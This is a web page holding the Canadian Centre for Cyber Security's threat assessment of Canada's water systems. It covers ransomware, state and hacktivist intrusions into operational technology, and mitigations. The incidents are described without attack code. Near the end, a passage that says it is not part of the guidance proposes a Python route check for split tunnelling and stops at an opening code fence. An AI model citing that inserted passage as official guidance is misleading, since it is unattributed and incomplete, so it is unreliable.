Canadian Centre for Cyber Security Events


You can help create a culture of cyber security in your organisation by sharing awareness messages in your communities.

  • Backgrounder: Malicious cyber activity targeting Canadian critical infrastructure
    by Canadian Centre for Cyber Security on November 26, 2025 at 9:11 pm


  • The cyber threat to Canada’s water systems: Assessment and mitigation
    by Canadian Centre for Cyber Security on November 25, 2025 at 3:00 pm

    <article data-history-node-id="6961" about="/en/guidance/cyber-threat-canadas-water-systems-assessment-mitigation" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout--onecol"> <div class="layout__region layout__region--content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><section><details class="mrgn-bttm-lg"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#0">About this document</a></li> <li><a href="#1">Message from the Head of the Cyber Centre</a></li> <li><a href="#2">Key judgements</a></li> <li><a href="#3">Canada’s water sector</a></li> <li><a href="#4">The threat from cybercriminals</a></li> <li><a href="#5">The state-sponsored cyber threat to water systems</a></li> <li><a href="#6">Non-state cyber actors: A growing threat</a></li> <li><a href="#7">Outlook: What this means for the Canadian Water Sector</a></li> <li><a href="#8">Mitigation</a></li> <li><a href="#9">Additional resources</a></li> <li><a href="#10">References</a></li> </ul></details></section><section><h2 class="text-info page-header mrgn-tp-lg" id="0">About this document</h2> <h3>Audience</h3> <p>This report is part of a series of cyber threat assessments focused on Canada’s critical infrastructure. It is intended for leaders of organizations in the water sector, cyber security professionals with a water or wastewater asset to protect, and the general reader with an interest in the cyber security of critical infrastructure. 
For guidance on technical mitigation of these threats, see the Mitigation section or contact the Canadian Centre for Cyber Security (the Cyber Centre).</p> <p>This assessment is Unclassified/TLP:CLEAR. TLP:CLEAR is used when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information, see <a href="https://www.first.org/tlp/">Traffic Light Protocol</a>.</p> <h3>Contact</h3> <p>For follow-up questions or issues, contact the Cyber Centre at <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</p> <h3>Assessment base and methodology</h3> <p>The key judgements in this assessment rely on reporting from multiple sources, both classified and unclassified. The judgements are based on the knowledge and expertise in cyber security of the Cyber Centre. Defending the Government of Canada’s information systems provides the Cyber Centre with a unique perspective to observe trends in the cyber threat environment, which also informs our assessments. The Communications Security Establishment Canada’s foreign intelligence mandate provides us with valuable insight into adversary behaviour in cyberspace. While we must always protect classified sources and methods, we provide the reader with as much justification as possible for our judgements.</p> <p>Our judgements are based on an analytical process that includes evaluating the quality of available information, exploring alternative explanations, mitigating biases and using probabilistic language. We use terms such as “we assess” or “we judge” to convey an analytic assessment. 
We use qualifiers such as “possibly”, “likely” and “very likely” to convey probability.</p> <p>The assessments and analysis are based on information available as of <strong>May 31, 2025</strong>.</p> <h3>Estimative language</h3> <img alt="Estimative language chart – long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/tdp4-language-chart-e.jpg" /><details class="mrgn-bttm-lg"><summary>Long description – Estimative language chart</summary><ul class="list-unstyled mrgn-tp-md"><li>1 to 9% Almost no chance</li> <li>10 to 24% Very unlikely/Very improbable</li> <li>25 to 39% Unlikely/Improbable</li> <li>40 to 59% Roughly even chance</li> <li>60 to 74% Likely/Probably</li> <li>75 to 89% Very likely/Very probable</li> <li>90 to 100% Almost certainly</li> </ul></details><div class="clearfix"> </div> </section><section><h2 class="text-info page-header mrgn-tp-xl" id="1">Message from the Head of the Cyber Centre</h2> <p>I spend a lot of time looking at threats most people never see. They are quiet, often hidden, yet capable of real-world consequences. Among the most critical are the cyber threats facing Canada’s water and wastewater systems. These systems are the backbone of modern life, yet they’re often out of sight and out of mind. When they function, no one notices. When they fail, everyone does.</p> <p>This assessment is meant to bring clarity to a topic that can feel abstract or overly technical. Cyber threats to water infrastructure are growing, evolving quickly, and can affect every community in Canada. You don’t need to be an engineer or a cyber security expert to understand why this matters. Clean water is essential, and the systems that deliver it are now largely digital – meaning they are vulnerable to the same kinds of cyber threats that target businesses and governments around the world.</p> <p>We’ve seen an unmistakable shift in recent years. 
Cybercriminals are more sophisticated, state-sponsored actors are more willing to target essential services, and disruptive tools are easier to access. Water systems now face a threat landscape they were never designed to withstand.</p> <p>Whether you’re a critical infrastructure executive, an elected official, or a policymaker, I want to emphasize that cyber security for water systems is not just a technical issue, it is a public safety issue, an economic stability issue, and ultimately a public trust issue. Leadership matters. The choices you make about investment, governance, and preparedness will determine our collective resilience in the years ahead.</p> <p>But this is not a message of alarm; it is a message of readiness. Across Canada, utilities, municipalities, and provincial and territorial partners have shown a strong commitment to improving their cyber resilience. What’s needed now is a clear-eyed analysis of the cyber threats facing our water systems in Canada. That’s what this assessment provides.</p> <p>My hope is that it empowers decision-makers to act confidently, ask the right questions, and support the people who keep these systems running. Cyber threats aren’t going away, but with awareness and a steady commitment to resilience, we can stay ahead of them.</p> <p>Sincerely,<br /><strong>Rajiv Gupta, Head of the Canadian Centre for Cyber Security</strong></p> <h2 class="text-info page-header mrgn-tp-lg" id="2">Key judgements</h2> <ul><li>We assess that operational technology (OT) networks that monitor and control physical processes are very likely the primary target for actors seeking to disrupt water systems.</li> <li>We assess that financially motivated cybercriminals are the most likely cyber threat to affect water systems. We assess that cybercriminals will almost certainly continue to exploit water sector organizations and systems through extortion tied to ransomware, exploiting stolen information, and business email compromise (BEC). 
We assess that ransomware is almost certainly the most significant cyber threat to the reliable supply of water in Canada due to the potential impacts against <abbr title="operational technology">OT</abbr> systems.</li> <li>We assess that water systems are almost certainly a strategic target for state-sponsored actors to project power through disruptive or destructive cyber threat activity. We assess that state-sponsored actors have almost certainly developed pre-positioned access to Canadian water systems. However, we judge that these actors would likely only disrupt those water systems in times of crisis or conflict between states.</li> <li>Non-state cyber actors are a growing threat to Canada’s critical infrastructure (CI). We assess that non-state actors will very likely continue to opportunistically compromise and disrupt Internet-exposed water system <abbr title="operational technology">OT</abbr> within Canada, especially in connection to major geopolitical events.</li> </ul></section><section class="mrgn-tp-lg"><h2 class="text-info page-header mrgn-tp-lg" id="3">Canada’s water sector</h2> <p>Good public and environmental health depend on access to clean water.<sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup>  Drinking water, stormwater and wastewater treatment systems (collectively: <strong>water systems</strong>) have many important economic, environmental, and safety uses. A loss of water does not just affect residents but also can have effects on other critical infrastructure. 
For example, in 2024, water main breaks in Calgary and Montreal resulted in cascading impacts on other systems, including hospitals, fire prevention and universities.<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup>  For these reasons and others, our water systems are considered part of Canada’s critical infrastructure (Figure 1).<sup id="fn3-rf"><a class="fn-lnk" href="#fn3"><span class="wb-inv">Footnote </span>3</a></sup>  Any disruption in the water system is not only a threat to public health and safety, but also a threat to public confidence, the environment and the economy.<sup id="fn4-rf"><a class="fn-lnk" href="#fn4"><span class="wb-inv">Footnote </span>4</a></sup>  As a result, the cyber security of our water systems is vital to Canada’s national security.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center"><strong>Figure 1: Critical infrastructure</strong></figcaption><p>Critical infrastructure refers to the processes, systems, facilities, technologies, networks, assets and services essential to the health, safety, security or economic well-being of Canadians and the effective functioning of government.</p> <img alt="Figure 1 – Long description immediately follows" class="img-responsive center-block" src="/sites/default/files/images/ncta-2023-fig5.jpg" /></figure><details><summary>Long description – Figure 1: Critical infrastructure</summary> Icons representing the 10 critical infrastructure sectors in Canada <ul><li>Energy and utilities</li> <li>Finance</li> <li>Food</li> <li>Health</li> <li>Government</li> <li>Safety</li> <li>Water</li> <li>Transportation</li> <li>Information and communication technology</li> <li>Manufacturing</li> </ul></details></div> </div> <h3>The threat surface of Canada’s water systems</h3> <p>A water system generally includes the services and infrastructure to safely and reliably obtain, store, filter and distribute potable water, 
divert runoff and floodwater as well as remove, collect and treat wastewater. Canada has thousands of water systems that vary greatly in size. A small number of large water utilities serve major urban areas while international organizations manage shared systems. Meanwhile, many small systems are owned and operated by municipalities, other levels of government, Indigenous communities, private sector companies and individual citizens.<sup id="fn5-rf"><a class="fn-lnk" href="#fn5"><span class="wb-inv">Footnote </span>5</a></sup></p> <p>Water systems operate in a variety of ways. Many are completely manual or even passive systems that require little to no active management, including most small water supplies and stormwater systems. Large urban water systems, in contrast, are usually geographically dispersed, industrial systems operated from a digital control environment. These include many remotely managed <abbr title="operational technology">OT</abbr> devices integrated into dams, pumping stations, and treatment facilities. These systems also extend into a web of connected suppliers of digital products and services.</p> <p>Many of these water systems are managed out of municipal or community offices and are exposed to all the cyber threats encountered by public-facing organizations. The more internet-connected assets an organization has, the larger the threat surface. 
A larger threat surface implies an increase in the cyber threat the organization faces.<sup id="fn6-rf"><a class="fn-lnk" href="#fn6"><span class="wb-inv">Footnote </span>6</a></sup>  In addition to increasing internet connectivity, most water systems are operated by small public sector organizations and frequently face challenges that can negatively influence cyber security, including low financial resources, aging physical and digital infrastructure and a shortage of cyber security expertise.<sup id="fn7-rf"><a class="fn-lnk" href="#fn7"><span class="wb-inv">Footnote </span>7</a></sup></p> <h4>The role of operational technology in our water systems</h4> <p>Operators use industrial <abbr title="operational technology">OT</abbr> including supervisory control and data acquisition (SCADA) and industrial Internet of things (IIoT) devices to manage large water systems and address issues like population growth, outdated infrastructure and declining revenue.<sup id="fn8-rf"><a class="fn-lnk" href="#fn8"><span class="wb-inv">Footnote </span>8</a></sup>  These systems are used to control water system equipment like dam gates, valves and pumps and to monitor sensors such as chemical detectors and flowrate monitors. The <abbr title="operational technology">OT</abbr> in water systems is continually evolving and is increasingly managed through digital devices with embedded computing and communications abilities.<sup id="fn9-rf"><a class="fn-lnk" href="#fn9"><span class="wb-inv">Footnote </span>9</a></sup>  This process, called digital transformation or digitalization, has allowed <abbr title="operational technology">OT</abbr> asset operators like those in the water sector to connect their <abbr title="operational technology">OT</abbr> devices to operating centres, corporate networks and, increasingly, directly to the internet. 
A 2021 survey counted over 60,000 <abbr title="operational technology">OT</abbr>-related network interfaces in Canada.<sup id="fn10-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup>  In 2023, a similar survey conducted on internet-connected devices associated mainly with water systems in the U.S. and UK found a relatively low level of basic cyber hygiene. Almost half of the devices could be manipulated without any authentication required.<sup id="fn11-rf"><a class="fn-lnk" href="#fn11"><span class="wb-inv">Footnote </span>11</a></sup></p> <p>Unfortunately, the management efficiency and savings gained from connecting digitally transformed <abbr title="operational technology">OT</abbr> also exposes the water system to cyber threats.<sup id="fn10a-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup>  For example, in early 2000, an employee was fired from a company providing services to Maroochy Water Services in Queensland, Australia. 
The individual retained remote access to the network of <abbr title="operational technology">OT</abbr> devices in the pumping stations of the wastewater treatment system.<sup id="fn12-rf"><a class="fn-lnk" href="#fn12"><span class="wb-inv">Footnote </span>12</a></sup>  He used this access to issue malicious commands to the <abbr title="operational technology">OT</abbr> devices that ultimately caused nearly a million litres of raw sewage to be discharged into local parks and rivers, causing severe environmental harm, according to officials.<sup id="fn13-rf"><a class="fn-lnk" href="#fn13"><span class="wb-inv">Footnote </span>13</a></sup>  This was the first known example of remote access to a public water system being used to disrupt or sabotage <abbr title="operational technology">OT</abbr> systems, and it illustrates the potential for cyber threats to jeopardize public and environmental safety and the local economy.<sup id="fn10b-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup>  <strong>We assess that operational technology (OT) networks that monitor and control physical processes are very likely the primary target for actors seeking to disrupt water systems</strong>.</p> <h4>On the rise: Cyber threats to supply chains</h4> <p>Water system utilities often depend on a diverse supply chain of digital products and services to operate, maintain and modernize their <abbr title="operational technology">OT</abbr> assets. The supply chain for these products and services includes manufacturers, vendors, integrators, contractors and service providers. 
Water system <abbr title="operational technology">OT</abbr>’s dependency on the supply chain is a critical vulnerability that gives cyber actors inside information on, and opportunities for access to, otherwise protected <abbr title="operational technology">OT</abbr> systems.</p> <p>Cyber threat actors target organizations’ digital supply chains to collect business and contextual information for use in social engineering attacks or to collect organizational network and system information to support future cyber attacks. Activity against the digital supply chain can also be an indirect route to gain access to the target organization’s networks in situations where there is continuous information transfer, for example software updates, or remote network access connections between the organization and its suppliers. In late 2019, a sophisticated cyber threat actor compromised the network management software vendor SolarWinds. The actors, attributed to Russia’s intelligence services, used their access to SolarWinds’ build environment to embed malicious code into a legitimately signed software update. 
The compromised update provided the actors access to thousands of client networks worldwide, including over 100 in Canada.<sup id="fn14-rf"><a class="fn-lnk" href="#fn14"><span class="wb-inv">Footnote </span>14</a></sup></p> <h4>Publicly available cyber tools are increasing the volume and effectiveness of cyber threat activity</h4> <p><strong>We assess it almost certain that cyber threat actors are increasingly using publicly available cyber tools to gain and maintain access to <abbr title="critical infrastructure">CI</abbr> networks, making it easier for threat actors of all levels of sophistication to target water sector <abbr title="operational technology">OT</abbr>.</strong> The wide availability of these tools, including legitimate penetration testing tools like Cobalt Strike, has lowered the barrier to entry to cyber threat activity and increased the capacity for cyber threat actors to gain, maintain, and expand access to target systems.<sup id="fn15-rf"><a class="fn-lnk" href="#fn15"><span class="wb-inv">Footnote </span>15</a></sup></p> <p>The proliferation of publicly available cyber tools has advantages for sophisticated cyber threat actors as well. Advanced cyber threat actors often use a combination of publicly available tools and living-off-the-land (LOTL) techniques when possible and bespoke malware when necessary. 
For example, People’s Republic of China (PRC) threat actors Volt Typhoon, Flax Typhoon and APT40 commonly use a mixed toolset and likely maintain an extensive catalog of open source and custom malware.<sup id="fn16-rf"><a class="fn-lnk" href="#fn16"><span class="wb-inv">Footnote </span>16</a></sup>  <abbr title="living-off-the-land">LOTL</abbr> techniques exclusively rely on legitimate tools and processes already present in the victim’s environment, for example Windows PowerShell or Windows Management Instrumentation, to carry out malicious activity.<sup id="fn17-rf"><a class="fn-lnk" href="#fn17"><span class="wb-inv">Footnote </span>17</a></sup>  These techniques allow threat actors to blend their malicious activity in with normal network activity. By using generic publicly available tools and <abbr title="living-off-the-land">LOTL</abbr> techniques, sophisticated actors limit the distinct signature they leave on a target’s network, making detecting cyber threat activity and attributing the source of that activity even more challenging.<sup id="fn18-rf"><a class="fn-lnk" href="#fn18"><span class="wb-inv">Footnote </span>18</a></sup></p> <h2 class="text-info page-header mrgn-tp-lg" id="4">The threat from cybercriminals</h2> <p><strong>We assess that financially motivated cybercriminals are the most likely cyber threat to affect water systems. 
We assess that cybercriminals will almost certainly continue to exploit water sector organizations and systems through extortion tied to ransomware, exploiting stolen information and business email compromise (BEC).</strong> <abbr title="business email compromise">BEC</abbr> is a type of fraud that uses compromised email accounts to trick people into transferring money or sensitive information to attacker-controlled accounts, while ransomware is malware that encrypts data or locks devices to extort a target organization for ransom payment.<sup id="fn19-rf"><a class="fn-lnk" href="#fn19"><span class="wb-inv">Footnote </span>19</a></sup>  Although <abbr title="business email compromise">BEC</abbr> is likely more common and more costly than ransomware to victims, ransomware can disrupt operations such as the delivery of safe drinking water through loss of visibility or control over important industrial processes.<sup id="fn20-rf"><a class="fn-lnk" href="#fn20"><span class="wb-inv">Footnote </span>20</a></sup>  <strong>We assess that ransomware is almost certainly the most significant cyber threat to the reliable supply of water in Canada due to the potential impacts against <abbr title="operational technology">OT</abbr> systems.</strong> Cybercriminals are aware that the disruption of critical products and services increases the pressure on an organization to pay ransom.<sup id="fn21-rf"><a class="fn-lnk" href="#fn21"><span class="wb-inv">Footnote </span>21</a></sup>  For example, ransomware attacks disrupted water treatment systems in California, Maine and Nevada in 2021, and in Kansas in 2024, forcing system operators to manually operate their <abbr title="operational technology">OT</abbr> systems to maintain service.<sup id="fn22-rf"><a class="fn-lnk" href="#fn22"><span class="wb-inv">Footnote </span>22</a></sup></p> <h3>Ransomware incidents are becoming more complex and costly to remediate</h3> <p><strong>We assess that ransomware attacks against <abbr 
title="critical infrastructure">CI</abbr> organizations, including those in the water sector, are almost certainly becoming more frequent as well as more costly and complex to remediate.</strong> The number of observed ransomware incidents has increased across sectors from 2021 to 2024. The size of ransom demands, cost of recovery, and the sophistication and complexity of tactics being used by cybercriminals have also increased.<sup id="fn23-rf"><a class="fn-lnk" href="#fn23"><span class="wb-inv">Footnote </span>23</a></sup>  These trends are driven by the proliferation of ransomware-as-a-service (RaaS) variants, the cybercrime-as-a-service (CaaS) ecosystem, and the increased use of multiple extortion methods.<sup id="fn24-rf"><a class="fn-lnk" href="#fn24"><span class="wb-inv">Footnote </span>24</a></sup></p> <p>Cybercriminals have widely adopted the practice of stealing and threatening to leak their victims’ sensitive data as either a supplement to traditional encryption-based extortion or as the primary lever for extortion. In mid-2023, the cybercriminal group CL0P exploited a vulnerability in MOVEit Transfer, a file transfer tool made by Progress Software. CL0P’s attacks were far-reaching, allowing them to steal information from government, public and business groups all over the world, including the water utility files of Queens Municipality in Nova Scotia.<sup id="fn25-rf"><a class="fn-lnk" href="#fn25"><span class="wb-inv">Footnote </span>25</a></sup>  In early 2024, 2 different cybercriminal groups conducted ransomware attacks against water sector organizations in North America and the United Kingdom. 
The groups disrupted <abbr title="information technology">IT</abbr> systems and leaked stolen data including business data and personal information.<sup id="fn26-rf"><a class="fn-lnk" href="#fn26"><span class="wb-inv">Footnote </span>26</a></sup></p> <h3>Cybercrime marketplaces provide specialized services and increase impacts against victims</h3> <p>Cybercrime is continuously evolving to maximize profits and increase the payouts extracted from targets.<sup id="fn27-rf"><a class="fn-lnk" href="#fn27"><span class="wb-inv">Footnote </span>27</a></sup>  The <abbr title="cybercrime-as-a-service">CaaS</abbr> ecosystem allows for specialization and division of labour among cybercriminal groups. This allows cybercriminals to access a range of services including network access brokering, access to <abbr title="ransomware-as-a-service">RaaS</abbr> variants and money laundering. Access brokers opportunistically collect network accesses into victim organizations and sell them to other cybercriminals. Those cybercriminals then conduct reconnaissance and use social engineering to determine which targets to deploy ransomware against. 
These decisions are often based on which organizations are most likely and/or able to pay a ransom.<sup id="fn19a-rf"><a class="fn-lnk" href="#fn19"><span class="wb-inv">Footnote </span>19</a></sup><sup id="fn27a-rf"><a class="fn-lnk" href="#fn27"><span class="wb-inv">Footnote </span>27</a></sup>  <strong>We assess that the <abbr title="cybercrime-as-a-service">CaaS</abbr> ecosystem is almost certainly increasing the number of actors participating in cybercrime by enabling less technically sophisticated actors to carry out cyber threat activity.</strong></p> <h2 class="text-info page-header mrgn-tp-lg" id="5">The state-sponsored cyber threat to water systems</h2> <p><strong>We assess that water systems are almost certainly a strategic target for state-sponsored actors to project power through disruptive or destructive cyber threat activity.</strong> State-sponsored actors pre-position for this activity by identifying and gaining access to Internet-connected <abbr title="operational technology">OT</abbr> systems or <abbr title="information technology">IT</abbr> networks from which they can laterally move to <abbr title="operational technology">OT</abbr> systems. Once in the target network, they collect information on assets within the network to identify opportunities for disruptive or destructive action. For example, this could mean causing water tanks to overflow or changing the chemical balance of water treatment processes. We assess that state-sponsored cyber threat actors have almost certainly developed pre-positioned access to Canadian water systems. 
However, we judge that these actors would likely only disrupt those water systems in times of crisis or conflict between states.</p> <p>State-sponsored cyber threat actors have targeted water sector organizations and systems globally for both espionage and disruption or destruction. In an early example of state-sponsored cyber activity in water system <abbr title="operational technology">OT</abbr>, in 2013, Iranian actors gained access to the <abbr title="supervisory control and data acquisition">SCADA</abbr> system of a small dam in New York State. This access gave them information on the dam’s status and would have allowed them to operate the dam’s sluice gate, which could affect water levels and flow rates in the watershed. The gate had been disconnected for maintenance at the time of the compromise, so the actors never obtained actual control of the dam’s physical equipment.<sup id="fn28-rf"><a class="fn-lnk" href="#fn28"><span class="wb-inv">Footnote </span>28</a></sup></p> <p>In 2023, an Islamic Revolutionary Guard Corps (IRGC) cyber unit acting under the non-state actor persona “CyberAv3ngers” compromised the Municipal Water Authority of Aliquippa, Pennsylvania. The CyberAv3ngers exploited a publicly exposed Unitronics Vision Series <abbr title="operational technology">OT</abbr> device with default passwords and defaced the system’s interface with an anti-Israel message. This activity was part of a broader campaign targeting commonly used Israeli-made <abbr title="operational technology">OT</abbr> devices, likely to undermine Western support for Israel. Tampering with the controller’s user interface implies a level of access that would allow full control over the device’s settings, as well as potential access to other devices on the network. 
It is not known if cyber activity beyond defacement was planned or carried out.<sup id="fn29-rf"><a class="fn-lnk" href="#fn29"><span class="wb-inv">Footnote </span>29</a></sup></p> <p>In 2023 and 2024, the Cyber Centre and its partners published the following joint advisories to warn critical infrastructure organizations of a <abbr title="People’s Republic of China">PRC</abbr> state-sponsored cyber group known as Volt Typhoon:</p> <ul><li><a href="https://www.cyber.gc.ca/en/news-events/joint-guidance-executives-and-leaders-critical-infrastructure-organizations-protecting-infrastructure-and-essential-functions-against-prc-cyber-activity">Joint guidance for executives and leaders of critical infrastructure organizations on protecting infrastructure and essential functions against <abbr title="People’s Republic of China">PRC</abbr> cyber activity</a></li> <li><a href="https://www.cyber.gc.ca/en/news-events/advisory-peoples-republic-china-state-sponsored-cyber-threat">CSE and its Canadian Centre for Cyber Security release advisory on People’s Republic of China state-sponsored cyber threat</a></li> <li><a href="https://www.cyber.gc.ca/en/news-events/joint-advisory-prc-state-sponsored-actors-compromising-and-maintaining-persistent-access-us-critical-infrastructure-and-joint-guidance-identifying-and-mitigating-living-land-0">Joint advisory on <abbr title="People’s Republic of China">PRC</abbr> state-sponsored actors compromising and maintaining persistent access to U.S. 
critical infrastructure and joint guidance on identifying and mitigating living off the land</a></li> </ul><p>Volt Typhoon activity has been observed since mid-2021 targeting the water sector and communication, transportation and energy organizations.<sup id="fn30-rf"><a class="fn-lnk" href="#fn30"><span class="wb-inv">Footnote </span>30</a></sup> Volt Typhoon strategically selects targets, pre-positioning itself in organizations that, if disrupted, would restrict military mobilization efforts and cause societal chaos. While the Cyber Centre assesses that the direct threat to Canada’s <abbr title="critical infrastructure">CI</abbr> from Volt Typhoon is less than that to the <abbr title="United States">U.S.</abbr>, it is not insignificant, especially for Canadian organizations that rely on cross-border trade, infrastructure or operations. In addition, the likelihood of a cyber attack impacting Canada’s <abbr title="critical infrastructure">CI</abbr> is higher than it otherwise might be because of the connections between <abbr title="United States">U.S.</abbr> and Canadian infrastructure.</p> <h2 class="text-info page-header mrgn-tp-lg" id="6">Non-state cyber actors: A growing threat</h2> <p>The Cyber Centre warned in our <a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a> that <strong>non-state cyber actors are a growing threat to Canada’s critical infrastructure</strong>. The wide proliferation of easy-to-use disruptive cyber capabilities has contributed to the emergence of a large ecosystem of hacktivists and other non-state actors who opportunistically target Canada and its allies for a variety of reasons. 
Often, this activity is intended to intimidate or coerce its targets or to influence Canadian public opinion or policy decisions related to geopolitical events outside Canada.</p> <p>Non-state threat activity frequently targets public-facing websites through techniques including distributed denial-of-service (DDoS) and defacement attacks. However, some non-state actors have adopted the practice of targeting and attempting to disrupt vulnerable Internet-connected <abbr title="operational technology">OT</abbr> systems. Although non-state actors have targeted <abbr title="operational technology">OT</abbr> across <abbr title="critical infrastructure">CI</abbr> sectors, a notable proportion of this activity has implicated water system <abbr title="operational technology">OT</abbr>.</p> <p>In May 2024, the Cyber Centre and partners issued a joint advisory warning of pro-Russia non-state actors targeting Internet-exposed industrial systems. These actors opportunistically identify targets using publicly available scanning tools to search for internet-exposed systems with vulnerable configurations, such as using default or weak passwords or not using multi-factor authentication.<sup id="fn31-rf"><a class="fn-lnk" href="#fn31"><span class="wb-inv">Footnote </span>31</a></sup>  After gaining access to these systems, they attempt to disrupt the system by defacing system interfaces, making configuration changes, and manipulating system controls. This activity can result in <abbr title="operational technology">OT</abbr> systems operating in unintended ways, operational disruptions, and, potentially, physical damage to the systems. 
For example, in early 2024, a non-state actor compromised the <abbr title="operational technology">OT</abbr> systems controlling water storage tanks in the towns of Abernathy and Muleshoe, Texas, and caused a tank overflow resulting in the loss of roughly 100,000 litres of water.<sup id="fn32-rf"><a class="fn-lnk" href="#fn32"><span class="wb-inv">Footnote </span>32</a></sup></p> <p>The Cyber Centre is aware of several instances of non-state actors similarly attempting to disrupt internet-exposed <abbr title="operational technology">OT</abbr> systems in Canada, including within water systems. <strong>We assess that non-state actors will very likely continue to opportunistically compromise and disrupt internet-exposed water system <abbr title="operational technology">OT</abbr> within Canada, especially in connection to major geopolitical events.</strong></p> <h2 class="text-info page-header mrgn-tp-lg" id="7">Outlook: What this means for the Canadian water sector</h2> <p>In the Cyber Centre’s <a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a>, we assess that the cyber threat to Canada’s critical infrastructure is almost certainly increasing. We judge that the primary threats to <abbr title="critical infrastructure">CI</abbr> come from cybercrime, state-sponsored adversaries and, increasingly, from non-state actors. Changes in the geopolitical environment have elevated the profile and importance of critical infrastructure as a target for cyber activity. 
This has combined with the increasing interconnectivity of <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> in the water sector to increase the cyber threat to the water supply.</p> <p>If Canada’s water infrastructure were to become a priority for state-sponsored actors, for example in the case of imminent or active armed conflict, we assess that any water system organizations with <abbr title="operational technology">OT</abbr> devices exposed to the Internet are almost certainly a target for disruptive cyber threat activity. Water systems may also be affected by cyber activity against other sectors due to the interconnected nature of infrastructure and supply chain complexity. For example, systems including water treatment plants, pumping stations, and distribution networks without backup power capacity may be vulnerable to disruptions in the energy sector, which may lead to interruptions in the treatment, storage and distribution of safe water to clients.</p> <p>Defending Canada’s water sector against cyber threats and related influence operations requires addressing both the technical and social elements of cyber threat activity. These include threats that originate in the digital supply chain, and the technology and skills shortage in the sector. There are almost certainly water system operators in Canada with exposed devices. 
The Cyber Centre encourages all critical infrastructure asset owners, including those in the water sector, to take appropriate mitigation measures to protect their systems against cyber threats.</p> <h2 class="text-info page-header mrgn-tp-lg" id="8">Mitigation</h2> <div class="mrgn-tp-md" id="expands-collapse"> <p>The Cyber Centre is dedicated to advancing cyber security and increasing the confidence of Canadians in the systems they rely on daily. This includes offering support to <abbr title="critical infrastructure">CI</abbr> and other systems of importance to Canada. We approach security through collaboration, combining expertise from government, industry and academia. Working together, we can increase Canada’s resilience against cyber threats. Cyber security investments will allow <abbr title="operational technology">OT</abbr> asset operators to benefit from new technologies, while avoiding undue risks to the safe and reliable provision of critical services to Canadians.</p> <p>The following mitigation measures can help water system operators prevent cyber threat actors from exploiting vulnerable systems, attacking devices and networks and stealing sensitive data. Each of the mitigations below is linked to the Cyber Centre’s <a href="https://www.cyber.gc.ca/en/cyber-security-readiness">Cyber Security Readiness Goals</a> (CRGs). The <abbr title="Cyber Security Readiness Goals">CRG</abbr>s are a set of baseline cyber security practices an organization can take to bolster its cyber security posture. 
Further details of each goal can be found in the <a href="https://www.cyber.gc.ca/en/cyber-security-readiness/cross-sector-cyber-security-readiness-goals-toolkit">Cross-Sector Cyber Security Readiness Goals Toolkit</a>. The mitigations below are highlighted to help prevent and reduce cyber attacks against the water sector.</p> <h3 class="mrgn-tp-md text-info">Protect all management interfaces</h3> <details><summary><h4>Phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> (CRG 2.7)</h4> </summary><p>Implement phishing-resistant multi-factor authentication (MFA) for access to assets, including all remote access to the <abbr title="operational technology">OT</abbr> network.<sup id="fn33-rf"><a class="fn-lnk" href="#fn33"><span class="wb-inv">Footnote </span>33</a></sup></p> <h5><abbr title="information technology">IT</abbr> accounts:</h5> <p>All <abbr title="information technology">IT</abbr> accounts should use <abbr title="multi-factor authentication">MFA</abbr> to access organizational resources. 
Prioritize accounts with the highest risk, such as privileged administrative accounts for key <abbr title="information technology">IT</abbr> systems.</p> <h5><abbr title="operational technology">OT</abbr> environments:</h5> <p>Enable <abbr title="multi-factor authentication">MFA</abbr> on all accounts and systems that can be accessed remotely, including:</p> <ul><li>vendor or maintenance accounts</li> <li>remotely accessible user and engineering workstations</li> <li>remotely accessible human-machine interfaces (HMIs)</li> </ul></details><details><summary><h4>Secure administrator workstation (CRG 2.21)</h4> </summary><p>Set up and enforce the use of a secure administrator workstation (SAW) for administrators to perform administrative tasks.</p> <p>A hardened <abbr title="secure administrator workstation">SAW</abbr>:</p> <ul><li>is not connected to the corporate <abbr title="information technology">IT</abbr> network</li> <li>is unable to install other software</li> <li>does not have access to the public Internet or email services</li> </ul><p>In cases where there is an operational requirement to use a <abbr title="secure administrator workstation">SAW</abbr> remotely, secure the <abbr title="secure administrator workstation">SAW</abbr> network traffic by using a layer 3 virtual private network (VPN). The protocols most widely used for <abbr title="virtual private network">VPN</abbr>s are:</p> <ul><li>Internet Protocol Security (IPSec)</li> <li>Transport Layer Security (TLS)</li> </ul><p>An <abbr title="Internet Protocol Security">IPSec</abbr> <abbr title="virtual private network">VPN</abbr> is an open standard, meaning that anyone can build a client or server that works with other <abbr title="Internet Protocol Security">IPSec</abbr> implementations. 
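</p> <p>One way to verify the “no split tunneling” property on a remotely used <abbr title="secure administrator workstation">SAW</abbr>, as an added example that is not part of this guidance or of the Cyber Centre’s tooling: the check below reads the output of <code>ip route show</code> on a Linux SAW and reports any path that leaves the host without going through the tunnel interface. It assumes a route-based IPsec tunnel that appears in the routing table as an interface (the interface name <code>ipsec0</code>, the gateway address and both route listings are constructed for the example, and only IPv4 is covered); a policy-based IPsec configuration would need <code>ip xfrm policy</code> inspected instead, and IPv6 routes would need the same treatment via <code>ip -6 route</code>.</p>

```python
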